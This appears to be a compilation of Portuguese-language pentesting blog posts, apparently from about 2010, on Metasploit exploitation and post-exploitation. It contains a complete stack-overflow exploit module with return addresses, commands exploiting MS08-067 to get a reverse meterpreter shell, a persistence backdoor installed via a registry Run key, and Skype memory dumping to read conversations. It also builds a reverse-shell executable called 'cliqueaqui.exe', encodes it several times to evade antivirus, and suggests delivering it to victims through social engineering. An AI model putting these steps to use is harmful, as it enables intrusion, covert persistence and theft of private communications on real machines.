//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}

//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}

//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}

int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );

if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}

//Pass the data received to the function pr
pr(Message);

//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);

WSACleanup();

return SS_OK;
}

Não sabe compilar no windows? Procure por Dev-C++ ou LCC-Win32 no google que rápidinho você passará a saber! :)

5 - E finalmente, 6 latinhas de cerveja.
-----> Qualquer buteco de esquina você acha! :)

Adicionando Exploit ao MSF

Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, para motivo de organização:

O que estou adicionando? Para qual sistema operacional ele é útil? O que ele explora?

Entendeu mais ou menos?

Vou explicar. Vamos para o diretório padrão do msf, para isso digite:
root@bt:~# cd /pentest/exploits/framework3/ root@bt:/pentest/exploits/framework3# ls
HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test
README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools
data external modules msfd msfgui msfpayload msfrpcd scripts
root@bt:/pentest/exploits/framework3#

Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em /opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).
Agora entre no diretório modules:

root@bt:/pentest/exploits/framework3# cd modules/

Agora em exploits. (O que estou adicionando?)

root@bt:/pentest/exploits/framework3/modules# cd exploits/

Em windows. (Para qual sistema operacional ele é útil?)

root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/

E por fim em misc. (O que ele explora?)

root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/

Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de sua preferência.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano exploit_stackoverflow.rb

Agora insira o exploit abaixo:

http://pastebin.com/raw.php?i=H26uL5ih

#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'

class Metasploit3 < info =" {})"> 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',

'Targets' =>
[
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(200)
], self.class)
end

def exploit
connect

junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end

Créditos Exploit: "Peter Van Eeckhoutte"

Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.

Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# msfconsole

Veja figura abaixo.

Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.

Explorando

Na máquina windows, execute o programa vulnerável. Para checarmos se está funcionando direitinho, basta um simples scan usando o nmap em nosso alvo, procurando pela porta 200, que é a porta que o nosso programa vulnerável "escuta".

Como pode ver acima, esta correndo tudo bem. Agora vamos usar o exploit que acabamos de adicionar para "ganharmos" acesso ao alvo.

Como podem ver, conseguimos explorar a vulnerabilidade do software e injetar as dll`s do meterpreter na memória RAM do nosso alvo.

Experimente digitar "ipconfig" e verá o IP do micro em que estamos. Logo em seguida, digite "ps" e verá todos os processos atuais no alvo.

Procure sempre migrar para um processo estável, pois dependendo do método utilizado para a intrusão no mundo real, o usuário que está utilizando o micro alvo, pode perceber algum "travamento" no software e fechá-lo. Para isso basta usar o comando "migrate" com a ajuda do "ps" mostrado acima. Procure pelo PID associado ao processo explorer.exe, que neste caso é o 1080.

Obs.: Em cada micro o PID poderá sofrer alterações.

DICA:

Durante a execução do exploit, podemos utilizar uma opção avançada para que faça a migração de processo automaticamente, nos poupando ter que digitar manualmente. Já imaginou se você enviar diversos arquivos pdfs, executáveis, arquivos xls/doc, etc, infectados para diversos alvos e tenha que migrar de processo em cada um? Não seria bom. Para isso podemos utilizar a opção "AutoRunScript", veja na figura abaixo.

Ok, vamos para a próxima parte!

Backdoor

Para que possamos continuar com o acesso ao alvo futuramente, precisamos instalar um backdoor, para isso vamos utilizar o script meterpreter "persistence", já comentei sobre ele em outro artigo.

Passando o parâmetro -h, ele nos mostra as opções disponíveis deste script. Veja abaixo.

Agora vamos utilizá-lo passando o parametro -X, veja na imagem e tente entender o que aconteceu olhando a saida do comando.

O comando acima criará um arquivo executável na maquina destino, a opção -X serve para que o arquivo criado seja executado durante o boot da máquina destino, vejam onboot=true. Repare na saída do comando o endereço IP local da máquina do atacante e que ela escutará na porta 4444, que é a padrão, podemos alterar a porta padrão para outra que nos convenha usando a opção -p seguido do número da porta, exemplo, -p 5555.

Veja que foi feito o upload do executável em C:\DOCUME~1\espreto\CONFIG~1\Temp\TcDWaEUCyFZC.vbs e foi identificado com o PID 728.

E em seguida foi criado e instalado um arquivo autorun na seguinte chave do registro HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tubTxZTznuuT.

Na ultima linha, ele nos da a opção para desfazer do "backdoor" que acabamos de criar, basta executar o comando conforme é mostrado. E é exatamente isso que vamos fazer agora, remover o backdoor recente instalado.

Mais Roberto, você nem mostrou como funciona na prática este backdoor!! Calma, basta acessar o outro artigo do VoL para ver como fazer isso.

http://www.vivaolinux.com.br/artigo/Metasploit-Exploitation/?pagina=6

Agora, vamos imaginar a seguinte situação: Acabamos de executar o script "persistence" usando a opção -X do micro com IP 192.168.1.181,certo? E se eu quiser conectar ao alvo de outro IP? Digamos que do IP 172.16.10.10? Bom, lembra do parâmetro -h? Utilize-o para visualizar novamente os parâmetros. Veja a imagem abaixo.

Com a opção "-U" o nosso agente será executado quando o usuário fizer o logon.
Parâmetro "-i 10" irá tentar a conexão com o IP especificado do atacante a cada 10 segundos, este valor pode ser alterado.
Parâmetro "-p 3773" especifica em que porta do micro do atacante, o metasploit estará escutando, neste caso na porta 3773.
E por último o parâmetro "-r 172.16.10.10" que especifica o IP que o atacante utiliza o metasploit conectar de volta.
As linhas seguintes, seguem a mesma linha de raciocínio quando foi usado a opção "-X".

Para usar o comando acima, basta alterar o IP 172.16.10.10 para o seu IP do micro (ou VM) executando o Backtrack/Metasploit.

Ok, agora desconecte desta atual sessão no meterpreter usando o comando "exit -y" e vamos utilizar o multi/handler para conectarmos novamente em nosso alvo, só que agora utilizando nosso backdoor.

E voilà! Temos acesso a shell meterpreter novamente. Vamos supor que o usuário ao abrir o gerenciador de tarefas do windows, note o processo "wscript.exe" suspeito e o finaliza (Acho bem improvável, mais...)! Perdemos a conexão "momentâneamente" com o alvo. Sendo assim recomendo migrar para o processo "explorer.exe" para que também possamos utilizar outros scripts que só funcionam estando neste processo. Vamos utilizar o "AutoRunScript", para isso desconecte novamente do meterpreter, saia também do console do msf e execute o metasploit desde o inicio.

Veja a imagem acima e repare que realizou exatamente o que queriamos.

Notaram que tivemos que digitar diversas vezes os comandos para conectarmos em nosso alvo? E se pudessemos automatizar isso digitando apenas uma vez? Ou apenas para fazer uma ou outra alteração?
Então vamos utilizar um recurso chamado "resource file", basta abrir seu editor de texto favorito e digitar os comandos linha por linha, como abaixo.

Depois de editado, basta executar da seguinte forma.

Tudo certo até aqui?

Process Dumping

De posse da shell meterpreter, vamos executar o script "process_dumping" em cima do processo do Skype. Vamos ver se a gente consegue achar algumas conversas?

Ok, no console no meterpreter, digitamos "run process_dumping -n Skype.exe" ou "run process_dumping -p PID" onde você deverá trocar o PID para o valor correto. Não sabe como ver isso? Basta executar o comando "ps", veja abaixo.

Neste caso, usarei especificando o PID

meterpreter> run process_dumping -p 976

Esperamos o termino e ele nos diz onde foi salvo o dump.

Pronto! Após o termino, vamos abrir uma nova shell e deixar o dump gerado mais "legível", para isso utilizamos o comando "strings", veja abaixo.

root@bt:~# cat dumping_skype.txt | grep "#robertoespreto" | more

Basta trocar "robertoespreto" pelo login correto.

Existe também um software chamado Skypeex, com ele você poderá visualizar de uma forma mais amigável este arquivo .txt. Segue o link para auto-estudo.

http://csitraining.co.uk/skypex.aspx

Procurando por arquivos.

Ok, vamos conectar novamente em nosso alvo para procurarmos arquivos "interessantes". Utilize a forma que achar melhor para se conectar novamente, digitando todos os comandos ou através do arquivo resource file, fica a seu critério! :)

Certo, de posse da shell meterpreter novamente, vamos usando o comando "search" para procurarmos por extensões conhecidas de arquivos, por exemplo, .xls do excel. Use o "-h" para visualizar os parâmetros do search.

Ok, como já disse, vamos procurar por arquivos criados com o excel, ou seja, os arquivos que tenha extensão .xls. Veja na figura abaixo.

Os parâmetros:

A opção "-d c:\\" diz que vamos procurar a partir da unidade C:.
A opção "-f *.xls" diz que vamos procurar por todos os arquivos que tiver a extensão .xls.
A opção "-r true" diz que a procura incluirá todos os subdiretórios além do atual.

Agora, eu quero pesquisar somente os arquivos .xls que esteja na area de trabalho do alvo. Eu também sei que uma parte do nome do arquivo possui a palavra "senha". Como ficaria a sintaxe?

Usem a imaginação, procurem por outras extensões. :)

Guardem estes pequenos conceitos deste artigo para continuarmos na parte 2.
Acabou sua cerveja quando chegou aqui? Ah, busque mais e seja feliz! Ah, vale ir de refrigerante também.

Dúvidas? Sugestões?

Roberto Soares (espreto)
codesec.blogspot.com
www.backtrack.com.br
robertoespreto@gmail.com
espreto@backtrack.com.br
Follow @espreto
®

Finish!

CAL9000 - Web Application Security Testing Assistant - Introdução

2010-09-19T10:56:00.038-03:00

APRESENTAÇÃO

CAL9000 é uma coleção de ferramentas de testes de segurança para aplicações Web, que
complementa os recursos atuais de web proxies e scanners automatizados. CAL9000 lhe dá a flexibilidade e funcionalidade que você precisará para testes manuais mais eficazes e menos esforços. Funciona melhor quando usado com os navegadores Firefox ou Internet Explorer. (Recomendo Firefox :P)

CAL900 é escrito em JavaScript, então você terá acesso total ao código-fonte. Sinta-se livre para modificá-lo para melhor atender as suas necessidades específicas. CAL9000 tem algumas características poderosas (como a execução cross-domain xmlHttpRequests e escrita para o disco).
Dedique alguns momentos para verificar as funcionalidades desta ferramenta.

Usaremos o CAL9000 para demonstrar os usos de uma ferramenta de testes de exploração. Como a maioria das ferramentas se concentra em algum tipo específico de ataque. Neste caso, seu foco principal é sobre ataques Cross-Site Scripting.

OBTENDO O CAL9000

Você pode baixá-lo no endereço http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project, como mostrado na figura abaixo.

Obs.: Se estiverem com dificuldades para efetuar o download, acessem o 3º link apresentado ao final deste artigo ou me enviem um e-mail para que eu possa disponibilizar a quem necessitar.

Quando o download estiver concluído,descompacte o arquivo e abra o arquivo CAL9000.html no seu navegador da Web, como mostrado na figura 2. Firefox (disponível a partir de http://www.mozilla.com/firefox/) É o browser recomendado para uso com CAL9000.

Neste ponto, você obteve com sucesso o conjunto de ferramentas de teste CAL9000. Na próxima seção, vamos caminhar com o que você pode fazer com CAL9000.

USANDO O CAL9000

CAL9000 é uma coleção de nove ferramentas que são usadas para testar aplicações web para vulnerabilidades de segurança, especificamente cross-site scripting. Você pode usar algumas destas ferramentas para testar outros tipos de vulnerabilidades, mas o foco principal deste conjunto de ferramentas está no cross-site scripting. Nesta seção, nós vamos levá-lo através da interface CAL9000 e descrever cada um das nove ferramentas:

XSS Attacks
Encode/Decode
HTTP Requests
HTTP Responses
Scratch Pad
Cheat Sheets
Misc Tools
Checklist
AutoAttack

Vamos começar no topo da lista com a guia de XSS Attacks.

ATAQUES XSS

Na página CAL9000.html, clique na guia XSS Attacks, como mostrado na figura 3.

Figura 3 - Clique na guia XSS Attacks.

Mostrará a ferramenta de XSS Attacks. Este é um dicionário de XSS Attacks conhecidos. Clique em um dos ataques listados no menu do lado esquerdo da tela, como mostrado na figura 4.

Figura 4 - Usando a tela de XSS Attacks.

No lado direito da tela, você verá o código de ataque na caixa de texto superior, e uma descrição do que o ataque é projetado para fazer na caixa de texto inferior. Nesta página, também há um editor que permite criar seu próprio código de ataque personalizado e salvá-la ao dicionário. Há também um testador de expressões regulares na parte inferior da página.

ENCODE/DECODE

Clique na guia Encode/Decode, como mostrado na figura 5, para apresentar a tela Encode/Decode.

Figura 5 - Clique na guia Encode/Decode.

Esta ferramenta permite-lhe codificar texto simples em uma variedade de formas, como mostrado na figura 6.

Figura 6 - Encode de texto simples em hexadecimal.

Isso é mais útil para testar se sua aplicação filtra com sucesso dados codificados. Esta página também pode decodificar os dados em uma variedade de formatos, como mostrado na figura 7.

Figura 7 - Decodifica uma string hexadecimal em texto puro.

A melhor hora para usar isto é, após a sua aplicação ter sido atacada. O decodificador permite que você leia os dados que um hacker usou para “break” em seu site. A menos que você conhece ou sabe a seqüência de caracteres que é codificado, você pode ter que tentar várias decodificações antes de encontrar o sucesso que produz um texto simples.

HTTP REQUESTS

Clique na guia HTTP Requests, como mostrado na figura 8, para abrir a tela de HTTP Requests.

Figura 8 - Clique na guia HTTP Requests.

A ferramenta HTTP Requests requer algum conhecimento de como funciona o protocolo
HTTP, pois permite-lhe enviar um cabeçalho HTTP raw, diretamente para um site ou aplicação web. A partir desta ferramenta, você também pode iniciar um AutoAttack contra o seu site. Esta é uma das ferramentas mais avançadas na caixa de ferramentas, então você provavelmente não vai precisar usá-lo para testes básicos. Se você entrar em um teste mais avançado de exploração, clique no botão Ajuda na parte superior da tela para uma explicação mais aprofundada de como esta ferramenta foi projetada, para fazer e como usá-lo.

HTTP RESPONSES

Clique na guia HTTP Responses, como mostrado na figura 9, para abrir a tela de HTTP Responses.

Figura 9 - Clique na guia HTTP Responses.

Esta ferramenta mostra os cabeçalhos HTTP devolvido pelo seu site e permite que você
visualize os scripts, formulários ou cookies disponíveis na página. A vantagem de utilizar esta ferramenta para analisar o seu site é que essas informações, são as que os crackers estão procurando quando elaborar um ataque contra uma aplicação. Se os crackers estão olhando para esta informação, você também precisa saber o que eles estão vendo. Isso também é útil para testar a segurança do servidor. Como você pode ver no topo da janela na Figura 10, a assinatura do servidor simplesmente diz "Apache", sem informações de versão ou informações sobre PHP ou outros módulos que podem estar em execução. Para utilizar esta ferramenta, digite o endereço do seu site e clique no botão Reload URL.

Figura 10 - Verifique se a segurança do seu servidor está funcionando corretamente.

Isto diz-nos que a diretiva ServerTokens definida no arquivo httpd.conf está funcionando corretamente. Compare isto com a assinatura de servidor de um site inseguro, como mostrado na figura 11.

Figura 11 - Assinatura de servidor de um site inseguro.

SCRATCH PAD

A guia Scratch Pad simplesmente leva você a uma página em branco onde você pode fazer
anotações sobre o que você encontrar usando as ferramentas e escrever lembretes para si mesmo, como mostrado na figura 12.

Figura 12 - A ferramenta Scratch Pad.

CHEAT SHEETS

Clique na aba Cheat Sheets, como mostrado na figura 13.

Figura 13 - Clique na guia Cheat Sheets.

Isso traz uma variedade de cheat sheets em várias linguagens e ferramentas que você pode precisar de um desenvolvedor do aplicativo da Web, como mostrado na figura 14.

Se você precisa usar uma das variáveis predefinidas do PHP, mas não consegue lembrar o nome exato, a cheat sheet para PHP trás para a tela.

Figura 14 - Uma das Cheats Sheets incluídas no CAL9000.

MISC TOOLS

Clique na aba Misc Tools, como mostrado na Figura 15.

Figura 15 - Clique na guia Misc Tools.

Isso traz algumas ferramentas que simplesmente não se encaixam em nenhum outro lugar. O Codificador IP e ferramentas String Generator são bastante auto-explicativas. A busca Scroogle, mostrado no lado direito da tela na Figura 16, é um front-end para o motor de busca do Google.

O Scroogle Search tira das ferramenta todas as informações agregadas que o Google acha antes de enviar sua solicitação de pesquisa para o motor de busca.

Figura 16 - A ferramenta de busca Scroogle.

CHECKLIST

Clique na guia Checklist, como mostrado na Figura 17, para abrir a ferramenta Checklist.

Figura 17 - Clique na guia Checklist.

Há duas seções principais para a ferramenta Checklist. A metade superior da tela dá-lhe uma lista de coisas importantes para testar, com sugestões e maneiras de teste para cada item e um exemplo ou medidas concretas para realizar o teste. A metade inferior da tela dá-lhe uma área de bloco de notas onde você pode fazer anotações sobre os resultados de seus testes, como mostrado na figura 18.

Figura 18 - A ferramenta de teste Checklist.

Esta é uma das áreas mais útil na ferramenta CAL9000 porque ajuda a garantir que você não esqueça de todas as áreas de vulnerabilidade em potencial encontradas.

AUTOATTACK

Figura 19 - Clique na guia AutoAttack.

A ferramenta AutoAttack é usada em conjunto com a ferramenta HTTP Requests, para formular ataques personalizados contra seu aplicativo. Este é um recurso avançado que, embora útil, não é crítico para a realização de testes básicos de segurança.

Figura 20 - Utilizando SQL Injection.

Para maiores informações:

OWASP CAL9000 Project
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

Securing PHP Web Applications
http://www.informit.com/store/product.aspx?isbn=0321534344

Web Application Security com CAL9000
http://www.vivaolinux.com.br/dica/Web-Application-Security-com-CAL9000

Obs.: Se não sabe o significado e a filosofia Hacker, leia o artigo "Uma breve descrição do termo "Hacker"", escrita por Julio Cesar Campos, usuário do VivaoLinux.
http://www.vivaolinux.com.br/artigo/Uma-breve-descricao-do-termo-Hacker

Roberto S. Soares (espreto)
robertoespreto@gmail.com
espreto@backtrack.com.br
Skype: robertoespreto
http://codesec.blogspot.com

"Eles se baseiam na matéria, e aqui ela não existe!"

Intrusão Simples com Metasploit

2010-03-25T15:58:00.012-03:00

Salve! Salve! Aqui vai mais um textinho falando sobre o framework Metasploit. Irei demonstrar algumas técnicas simples/básicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma máquina MS para obtermos uma shell. Let`s go???

Começando!

Bom galera, vamos começar!

Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (Virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico.

O cenário utilizado foi o seguinte:

Neste caso, são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs, estão configuradas como bridge.

1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.

Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrará ótimos artigos/dicas sobre o mesmo.

Scanning com Nmap e Metasploit

Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o backtrack e digite a seguinte sintaxe:

# nmap -v -sS --script=smb-check-vulns 192.168.0.0/24

-v = Modo Verbose
-sS = TCP Syn Scan
--script=smb-check-vulns = Script para verificar vulns conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.

Se repararem, no host com endereço IP 192.168.0.186, verá que é mostrado as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.
Certo, descobrimos um host dentro da nossa LAN que está possívelmente vulnerável ao nosso ataque pretendido!
Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...

Obtemos nosso console do msf. Dei uma personalizada na saída :-)

Feito isto, vamos efetuar a intrusão na máquina.
Os comando são os seguintes:

use exploit/windows/smb/ms08_067_netapi <------ Aqui falamos que queremos usar o exploit ms08_067_netapi

set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2

set PAYLOAD windows/meterpreter/reverse_tcp <------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.

set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.

exploit <------ E finalmente executamos nosso exploit. Observem a imagem abaixo.

Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.

Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.

Opções Metasploit

Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do Sistema Operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos atráves do script do nmap que nosso alvo é vulnerável, podemos "nós" realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.

Certo, mais como? Poderiamos fazer utilizando o nmap, mais vamos utilizar um módulo auxiliar presente no metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.

Executaremos os seguintes comandos:

use auxiliary/scanner/smb/smb_version <---- Falamos que queremos utilizar o scanner smb_version.

set RHOSTS 192.168.0.186 <---- Aqui eu setei um único host (192.168.0.186), mais poderia especificar um range, exemplo, 192.168.0.0/24.

run <---- Comando para executar nosso scanner.

Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.

use exploit/windows/smb/ms08_067_netapi <------ Aqui falamos que queremos usar o exploit ms08_067_netapi

set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2

set PAYLOAD windows/meterpreter/reverse_tcp <------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.

set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.

set TARGET 31 <------ Aqui eu digo o que o alvo está usando.

exploit <------ E finalmente executamos nosso exploit. Na imagem abaixo, é listado com o comando show targets, todos os S.O.s vulneráveis a este exploit (ms08_067).

Veja abaixo que irei utilizar a opção 31.

Veja o ataque agora.

Veja que não foi realizado a etapa de fingerprint com o alvo, pois "falamos" para o exploit, o S.O. que ele encontrará em seu destino.

Ok! Finish! The end! Heheheh

Ah!

É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.
Como continuação, poderão seguir o outro artigo que escrevi sobre o Metasploit.

Metasploit Exploitation
http://codesec.blogspot.com/2010/02/metasploit-exploitation.html

Abraços a todos!

Roberto Soares (3spreto)
codesec.blogspot.com
WWW.backtrack.com.br
robertoespreto@gmail.com
espreto@backtrack.com.br
®

F1 = Fórmula 1? NÃO! Mais uma vuln. do IE.

2010-03-02T16:25:00.021-03:00

Na sexta-feira (26/02/2010) foi levantada uma questão de segurança, alertando os usuários do Windows XP, para que não pressionem a tecla F1, se solicitado durante a navegação pela internet usando o navegador internet explorer. Caso contrário, poderá ser facilitada a invasão do computador, permitindo um controle total do mesmo pelo atacante.

Segue link da notícia.

Investigating a new win32hlp and Internet Explorer issue

O exploit já se encontra disponível no trunk do metasploit, basta atualizá-lo com o comando svn update.

Na imagem acima, estou usando o exploit ie_winhlp32 com o metasploit e esperando que o usuário clique em nosso link, no caso, http://192.168.0.192/. Aqui é demonstrado um jeito "simples" de usar o exploit, para fins de testes e também para demonstrar ao usuário final as possíveis mensagens que deverá aparecer a eles, caso venham a acessar algum site malicioso. Segue imagens abaixo.

Abaixo, alterei a mensagem para o português!

Fica o aviso ae pessoal!
Testado com o IE7 no windows XP com SP3! Com o IE8 no XP SP3 totalmente atualizado também funcionou, conforme testes de alguns profissionais!

Recomendação: Utilizem o Firefox, até que seja disponilizado pela microsoft um patch para a correção da vulnerabilidade!

Obs.: Para os profissionais de S.I. que, com certeza saberam usar o exploit, alterem as devidas opções para o funcionamento correto do exploit! :)

Abraços à todos!

3spreto
.

Metasploit Exploitation

2010-02-21T09:28:00.036-03:00

Metasploit¹ é uma ferramenta utilizada, em sua maior parte, por Pen Testers², para a realização de testes de penetração (penetration test), podendo ser usada pelas mais variadas áreas, para fins de testes, análises, conhecimento, etc. Este artigo visa demonstrar algumas formas de uso para a pós-exploração de um alvo, usando o framework Metasploit, este que se encontra em sua versão 3.3.4-dev.

Recomendo, para este artigo um conhecimento prévio sobre o framework, linha de comando em Linux³, redes de computadores⁴, TCP/IP⁵, etc!

O cenário utilizado para a criação deste artigo é mostrado na figura a baixo.

Descrição:

Attacker = De onde partiram os ataques.
Roteador1 = Roteador da rede local do atacante.
XX.XX.XX.XX = IP WAN
YY.YY.YY.YY = IP WAN
Roteador2 = Roteador da rede local do alvo.
10.0.0.0/8 = Classe utilizada na rede interna do alvo.

Obs.: Ficar atento ao redirecionamento das portas no roteador para a máquina atacante.

Nota: Em seus testes, não há a necessidade de utilizar as mesmas classes de IPs, quantidades de máquinas utilizadas neste exemplo, fica a seu critério a alteração dos mesmos.

Dica: Com 2 máquinas reais e softwares de virtualização⁶ instalada em ambos, você conseguirá montar o cenário acima proposto.

Começando:

Assumirei que você já tenha estabelecido uma sessão meterpreter com pelo 1 máquina na rede alvo.

Ah, ainda não? E não sabe como fazer?Ok! Sem problemas, irei demonstrar uma simples técnica apenas para ganharmos a sessão meterpreter e assim podermos continuar com nosso artigo.

Entre no diretório do MSF com o seguinte comando:

root@bt:~# cd /pentest/exploits/framework3/

Ok! Antes de continuarmos, é sempre bom mantermos o metasploit atualizado, sendo assim, como já estamos no diretório do msf, basta o comando svn update para atualizarmos o MSF.

root@bt:/pentest/exploits/framework3# svn update

Com o msf atualizado, iremos criar o payload que enviaremos para o nosso alvo.
Prosseguimos com o seguinte comando:

root@bt:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4455 X > cliqueaqui.exe

Será criado no diretório corrente o arquivo executável “cliqueaqui.exe”, agora basta enviar para o alvo e aguardá-lo clicar para execução, certo?

NÃO, não está certo! E os anti-virus? Com este simples payload que criamos, o AV, detectará assim que ele por os “pés” no alvo!

Se enviarmos o arquivo criado acima “cliqueaqui.exe” para uma analise online com vários AVs, veremos que muitos o detectam.
Utilizei o site Virus Total⁸ para a verificação online do arquivo, veja a imagem abaixo que dos 40 AVs existentes no site, apenas 13 identificam o nosso arquivo “cliqueaqui.exe”.

Veja também no site Verificador de Malware Jotti⁹, neste, dos 20 scanners, 7 detectam o arquivo.

Sendo assim, vamos “tunar” nosso arquivo cliqueaqui.exe. Digite o seguinte comando:

root@bt:/pentest/exploits/framework3# msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4455 R | msfencode -c 15 -e x86/shikata_ga_nai -a x86 -t raw | msfencode -c 5 -a x86 -e x86/alpha_mixed -t raw | msfencode -c 3 -e x86/call4_dword_xor -t exe > cliqueaqui2.exe

Obs.: Troquem XX.XX.XX.XX pelo IP WAN do seu roteador!

Obs.: Lembrando que o comando acima não é a melhor prática para burlar AV!

Pronto, agora podemos ver que já diminuímos a quantidade de AVs que estavam detectando nosso arquivo, como pode ser visto na figura abaixo.

Concluído a criação do nosso payload, agora vamos para a próxima fase.

Nota: Não entrarei em detalhes nas opções usadas acima a princípio, assim que possível explicarei os opções novamente com outro artigo mais detalhado neste quesito.

Dica: Aqui foi usado um simples payload reverso para conseguirmos estabelecer a sessão meterpreter. Mais poderiam ser utilizados outras técnicas, como, envio de arquivo pdf com código malicioso, uma imagem jpeg, um arquivo doc, usando engenharia social fazendo com que a vitima execute outros arquivos, etc.. Fica para um próximo artigo.

USEM A IMAGINAÇÃO.

Dica: Gaste algum tempo na leitura das opções dos comandos usados acima.

# ./msfpayload –h
# ./msfencode –h
# ./msfencode –l

Obs.: Vou considerar que vocês criaram um ambiente virtual para os testes, sendo assim, não há a necessidade de aprofundar (não agora!) em criação de payloads e tal, na máquina virtual, vocês podem desabilitar o AV e executar o primeiro payload que criamos, assim, será criada a sessão entre o atacante e o alvo normalmente.

Console Metasploit:

Agora que criamos nosso arquivo “cliqueaqui2.exe” e enviamos ao alvo, precisamos deixar nosso msf “escutando” as conexões, esperando a execução do nosso arquivo no alvo.
Para isso, de os seguintes comandos no console do metasploit:

msf > use exploit/multi/handler
msf > set PAYLOAD Windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.110
msf > set LPORT 4455
msf > exploit

Veja os comandos na imagem abaixo:

Ao ser executado o nosso arquivo no computador da vitima, será estabelecida uma conexão entre o Atacante e o alvo. Assim, ganhamos nossa Shell meterpreter.
Veja imagem abaixo.

Aparentemente parece que está travado, mais não está! Repare que a sessão meterpreter já foi criada, sendo assim, pressionamos Ctrl+C para finalizar este “travamento”.
Agora digite o comando sessions –l, como abaixo.

Temos uma sessão ativa com ID de número 1 identificando-a.
Veja que aparentemente conectamos do IP da nossa máquina local (192.168.0.110) com o IP WAN do roteador2 (YY.YY.YY.YY).

Agora vamos interagir com o console meterpreter, basta o comando sessions –i 1 como mostrado abaixo.

Yes! Agora sim, vamos começar o artigo! :)

Meterpreter

